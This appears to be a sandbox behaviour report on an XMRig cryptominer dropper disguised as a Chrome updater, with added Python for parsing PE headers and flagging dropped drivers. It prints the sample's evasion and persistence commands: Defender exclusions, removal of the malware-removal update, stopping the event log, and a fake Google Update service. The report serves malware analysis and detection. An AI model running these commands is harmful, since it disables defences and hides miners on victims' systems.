                Source: Process Memory Space: conhost.exe PID: 5596, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 (reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25)
                Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.mine.winEXE@59/13@4/4
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4512:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2360:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1864:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1812:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4368:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4284:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1848:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6752:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Global\vazasxarlpknfxrw
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jodddkj1.w0x.ps1
                Source: updater.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wusa.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\wusa.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" (this identical query is logged 47 times from wusa.exe)
                Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe" (this identical query is logged 47 times from conhost.exe)
                Source: C:\Users\user\Desktop\updater.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\updater.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\ProgramData\Google\Chrome\updater.exe | File read: C:\Windows\System32\drivers\etc\hosts
                Source: updater.exe | ReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\updater.exe | File read: C:\Users\user\Desktop\updater.exe
                Source: unknown | Process created: C:\Users\user\Desktop\updater.exe "C:\Users\user\Desktop\updater.exe"
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown | Process created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                Source: C:\ProgramData\Google\Chrome\updater.exe | Process created: C:\Windows\System32\conhost.exe conhost.exe
                Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                Source: C:\Users\user\Desktop\updater.exe | Section loaded: apphelp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (×2), cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll (×11), umpdc.dll (×4)
                Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll, wtsapi32.dll, cryptsp.dll, kernel.appcore.dll, uxtheme.dll
                Source: C:\ProgramData\Google\Chrome\updater.exe | Section loaded: apphelp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
                Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll (×12), umpdc.dll (×4)
                Source: C:\Windows\System32\wusa.exe | Section loaded: dpx.dll, wtsapi32.dll, cryptsp.dll, kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll, licensemanagersvc.dll, licensemanager.dll, clipc.dll, cryptsp.dll, wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: updater.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: updater.exeStatic file information: File size 5285888 > 1048576
                Source: updater.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x4f5e00
                Source: updater.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000018.00000003.2105630449.0000021747340000.00000004.00000001.00020000.00000000.sdmp
                Source: updater.exeStatic PE information: section name: .00cfg
                Source: updater.exe.0.drStatic PE information: section name: .00cfg
                Source: C:\Windows\System32\conhost.exeCode function: 36_2_0000000140001394 push qword ptr [0000000140009004h]; ret 36_2_0000000140001403
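The static observations above (image base 0x140000000, file size over 1 MiB, a .data section with raw size 0x4f5e00, the .00cfg section name and the DllCharacteristics flags) are all read straight from the PE headers. The Python below is an added example, not taken from the report or the sample: it parses those headers with a minimal PE32+/PE32 reader and reproduces the findings against an image constructed in memory with the reported values. The builder, the finding names and the section list are assumptions made for this illustration.

```python
"""Re-derive the report's static PE findings from the headers themselves.

build_sample_pe() constructs a PE32+ image in memory with the values the
report lists; it stands in for the analysed file, which is not reproduced here.
"""
import struct

DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}
# Section names a default MSVC link emits. ".00cfg" (Control Flow Guard data,
# emitted with /guard:cf) is left out so it is reported, as the sandbox does,
# but on its own it is a weak signal.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".pdata", ".idata", ".edata",
                   ".rsrc", ".reloc", ".tls", ".bss", ".gfids"}


def inspect_pe(data: bytes) -> dict:
    """Parse DOS/COFF/optional/section headers; no section contents are read."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:      # PE32+: 64-bit ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    elif magic == 0x10B:    # PE32: 32-bit ImageBase at +28 (BaseOfData sits at +24)
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        raise ValueError("unknown optional header magic")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    sections = []
    for i in range(nsections):
        name, _vsize, _vaddr, raw_size, _raw_ptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), raw_size))
    return {
        "image_base": image_base,
        "dll_characteristics": {n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit},
        "sections": sections,
        "file_size": len(data),
    }


def static_findings(info: dict) -> list:
    """Apply the same thresholds the report uses to the parsed header fields."""
    out = []
    if info["image_base"] > 0x60000000:
        out.append("image_base_above_0x60000000")   # normal for 64-bit builds at 0x140000000
    if info["file_size"] > 1 << 20:
        out.append("file_size_over_1MiB")
    for name, raw_size in info["sections"]:
        if name == ".data" and raw_size > 0x100000:
            out.append("data_section_raw_size_over_1MiB")  # room for embedded payloads
        if name not in COMMON_SECTIONS:
            out.append("uncommon_section_name:" + name)
    return out


def build_sample_pe(image_base: int, dll_chars: int, sections) -> bytes:
    """Construct a minimal PE32+ image; sections are (name, raw_size) pairs."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x22)
    opt = struct.pack("<HBBIIIIIQ", 0x20B, 14, 0, 0, 0, 0, 0x1000, 0x1000, image_base)
    opt += struct.pack("<IIHHHHHHIIIIHH", 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, 0, 0x400, 0, 2, dll_chars)
    opt += struct.pack("<QQQQII", 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    headers_len = len(dos) + 4 + len(coff) + len(opt) + 40 * len(sections)
    first_raw = headers_len + (-headers_len) % 0x200       # file-align the first section
    hdrs, body, raw_ptr, vaddr = b"", b"", first_raw, 0x1000
    for name, raw_size in sections:
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), raw_size, vaddr,
                            raw_size, raw_ptr, 0, 0, 0, 0, 0x40000040)
        body += b"\0" * raw_size
        raw_ptr += raw_size
        vaddr += raw_size + (-raw_size) % 0x1000
    image = dos + b"PE\0\0" + coff + opt + hdrs
    return image + b"\0" * (first_raw - len(image)) + body


# Constructed stand-in carrying the values the report lists for updater.exe.
SAMPLE_PE = build_sample_pe(0x140000000, 0x0020 | 0x0040 | 0x0100 | 0x8000,
                            [(".text", 0x200), (".data", 0x4F5E00), (".00cfg", 0x200)])

if __name__ == "__main__":
    parsed = inspect_pe(SAMPLE_PE)
    print(hex(parsed["image_base"]), sorted(parsed["dll_characteristics"]))
    print(static_findings(parsed))
```

Of the four findings, the image base and the DllCharacteristics set describe an ordinary 64-bit MSVC build and carry no weight by themselves; the 5 MB .data section is the lead worth following, since the run-time entries show the sample dropping both an executable and a driver.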

                Persistence and Installation Behavior

                Source: C:\ProgramData\Google\Chrome\updater.exe | File created: C:\Windows\Temp\maoxoafwbtki.sys (driver; listed three times, once with the directory spelled C:\Windows\TEMP)
                Source: C:\Users\user\Desktop\updater.exe | File created: C:\ProgramData\Google\Chrome\updater.exe (dropped file; listed twice)
                Source: C:\Users\user\Desktop\updater.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
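The persistence entries above record a driver written to the Windows temp directory under a random name (the sandbox lists the same file several times with differing path case) and a copy of the sample placed under a vendor-looking ProgramData path, while the memory dump earlier carried the WinRing0.pdb path. The Python below is an added example, not part of the report: it normalises and de-duplicates file-creation events modelled on those entries, flags drivers created outside the driver store and executables written to ProgramData from a user profile, and scans file bytes for the WinRing0 marker. The event list, the driver bytes, the rule names and the severities are constructed for this example.

```python
"""Classify file-creation events like the ones in the persistence section above.

Events are (creating_process, created_path). FILE_EVENTS and
SAMPLE_DRIVER_BYTES are constructed for this example; the real dropped
driver is not reproduced here.
"""
import ntpath
import re

# Where drivers legitimately land; anything else is worth a look.
DRIVER_HOMES = ("c:\\windows\\system32\\drivers\\", "c:\\windows\\system32\\driverstore\\")
TEMP_DIR = re.compile(r"\\(?:temp|tmp)\\")
USER_PROFILE = re.compile(r"^[a-z]:\\users\\")
PROGRAMDATA = re.compile(r"^[a-z]:\\programdata\\")
# Marker strings of drivers known to be abused; WinRing0 is the OpenLibSys driver
# that gives user mode MSR and physical-memory access and ships with XMRig builds.
KNOWN_DRIVER_MARKERS = {b"WinRing0": "WinRing0 (OpenLibSys driver abused for MSR access)"}


def normalise(path: str) -> str:
    """Lower-case and normalise an NT path so TEMP and Temp compare equal."""
    return ntpath.normcase(ntpath.normpath(path))


def classify_file_events(events):
    """Return (rule, severity, normalised_path) once per distinct artefact."""
    seen = set()
    findings = []
    for image, path in events:
        key = (normalise(image), normalise(path))
        if key in seen:          # sandbox repeats the same artefact with different casing
            continue
        seen.add(key)
        img, p = key
        if p.endswith(".sys") and not p.startswith(DRIVER_HOMES):
            severity = "high" if TEMP_DIR.search(p) else "medium"
            findings.append(("driver_outside_driver_store", severity, p))
        if p.endswith(".exe") and PROGRAMDATA.match(p) and USER_PROFILE.match(img):
            findings.append(("pe_dropped_to_programdata_from_user_profile", "medium", p))
    return findings


def driver_markers(data: bytes):
    """Labels of known drivers whose marker string occurs in the file bytes."""
    return [label for marker, label in KNOWN_DRIVER_MARKERS.items() if marker in data]


# Constructed from the report's entries, plus one benign control.
FILE_EVENTS = [
    (r"C:\ProgramData\Google\Chrome\updater.exe", r"C:\Windows\TEMP\maoxoafwbtki.sys"),
    (r"C:\Users\user\Desktop\updater.exe", r"C:\ProgramData\Google\Chrome\updater.exe"),
    (r"C:\ProgramData\Google\Chrome\updater.exe", r"C:\Windows\Temp\maoxoafwbtki.sys"),
    (r"C:\Users\user\Desktop\updater.exe", r"C:\ProgramData\Google\Chrome\updater.exe"),
    # Constructed benign control: a driver staged through the driver store must not fire.
    (r"C:\Windows\System32\drvinst.exe",
     r"C:\Windows\System32\DriverStore\FileRepository\sample.inf_amd64\sample.sys"),
]
# Constructed bytes standing in for the dropped driver, carrying the PDB path from the report.
SAMPLE_DRIVER_BYTES = (b"MZ" + b"\0" * 64 +
                       b"d:\\hotproject\\winring0\\source\\dll\\sys\\lib\\amd64\\WinRing0.pdb")

if __name__ == "__main__":
    for rule, severity, path in classify_file_events(FILE_EVENTS):
        print(f"{severity:6} {rule:44} {path}")
    print(driver_markers(SAMPLE_DRIVER_BYTES))
```

The random file name is not used as a signal on purpose: it changes per run, whereas a .sys file appearing under C:\Windows\Temp and a WinRing0 marker in its bytes stay constant across builds of this miner, and the sc.exe delete of the GoogleUpdateTaskMachineQC service is the third host artefact to pair with them.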

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (×8)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (×6)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (×120)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
